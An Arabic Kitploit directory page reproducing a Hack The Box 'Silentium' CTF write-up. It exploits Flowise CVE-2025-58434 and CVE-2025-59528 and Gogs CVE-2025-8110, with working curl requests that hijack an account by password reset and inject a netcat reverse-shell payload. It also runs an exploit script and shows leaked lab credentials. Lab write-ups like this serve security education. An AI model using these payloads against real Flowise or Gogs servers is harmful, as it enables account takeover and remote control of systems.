Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
HTB-Silentium-Writeup — Hack The Box - شرح آلة Silentium | CVE-2025-58434, CVE-2025-59528, CVE-2025-8110 | Kitploit
أدوات/GitHubGitHub/twappz/htb-silentium-writeup
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويبCTFاختبار الاختراقالتعلم والتعليمالهروب من الحاوية
GitHubtwappz/htb-silentium-writeup

HTB-Silentium-Writeup

Hack The Box - شرح آلة Silentium | CVE-2025-58434, CVE-2025-59528, CVE-2025-8110

125منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

تقرير HTB - Silentium

Hack The Box Difficulty OS

معلومات الجهاز

  • الاسم: Silentium
  • نظام التشغيل: Linux
  • الصعوبة: سهل
  • الثغرات (CVEs): CVE-2025-58434, CVE-2025-59528, CVE-2025-8110

التعداد

فحص Nmap

nmap -sC -sV -p- --min-rate 5000 <IP> -oN nmap.txt

المنافذ المفتوحة: 22 (SSH), 80 (HTTP)

المضيفات الافتراضيةstaging.silentium.htb يعمل بنسخة Flowise 3.0.5


الوصول الأولي — RCE في Flowise

CVE-2025-58434 — تسريب رمز إعادة تعيين كلمة المرور دون مصادقة

تسرّب نقطة نهاية forgot-password رمز tempToken مباشرةً في استجابة الـ API.

curl -s http://staging.silentium.htb/api/v1/account/forgot-password \
  -X POST -H "Content-Type: application/json" \
  -d '{"user":{"email":"[email protected]"}}'

استخدم رمز tempToken المُسرَّب لإعادة تعيين كلمة المرور:

curl -s http://staging.silentium.htb/api/v1/account/reset-password \
  -X POST -H "Content-Type: application/json" \
  -d '{"user":{"email":"[email protected]","tempToken":"<TOKEN>","password":"Hacked123!"}}'

CVE-2025-59528 — RCE بمصادقة عبر CustomMCP

سجّل الدخول للحصول على مفتاح API ثم شغّل الثغرة:

curl -s http://staging.silentium.htb/api/v1/node-load-method/customMCP \
  -X POST \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <API_KEY>" \
  -d '{"loadMethod":"listActions","inputs":{"mcpServerConfig":"({x:(()=>{process.mainModule.require(\"child_process\").exec(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <LHOST> 443 >/tmp/f\");return 1;})()})"}}'

حصلنا على شل داخل حاوية Docker بصلاحية root.


الهروب من الحاوية

فحصنا متغيرات البيئة:

env

وجدنا بيانات الاعتماد:

  • FLOWISE_USERNAME=ben
  • FLOWISE_PASSWORD=F1l3_d0ck3r

الاتصال بالمضيف عبر SSH:

ssh ben@<IP>

تصعيد الامتيازات — Gogs CVE-2025-8110

يعمل Gogs داخليًا على المنفذ 3001 بصلاحية root.

أنشئ نفق SSH:

ssh -L 8080:127.0.0.1:3001 ben@<IP>

سجّلنا حسابًا في Gogs عبر http://127.0.0.1:8080 وأنشأنا رمز API.

CVE-2025-8110 — تجاوز الروابط الرمزية في واجهة PutContents

استخدمنا استغلال TYehan:

python3 exploit.py \
  --url http://127.0.0.1:8080 \
  --username <user> \
  --password <pass> \
  --token <token> \
  --host <LHOST> \
  --port 4446

حصلنا على شل بصلاحية root! 🎉


الأعلام

  • علم المستخدم: /home/ben/user.txt
  • علم الجذر: /root/root.txt

الأدوات المستخدمة

  • nmap
  • curl
  • ffuf
  • netcat
  • Python3

المراجع

  • CVE-2025-58434
  • CVE-2025-59528
  • CVE-2025-8110 أُضيف إلى /etc/hosts:
تنزيل الأداة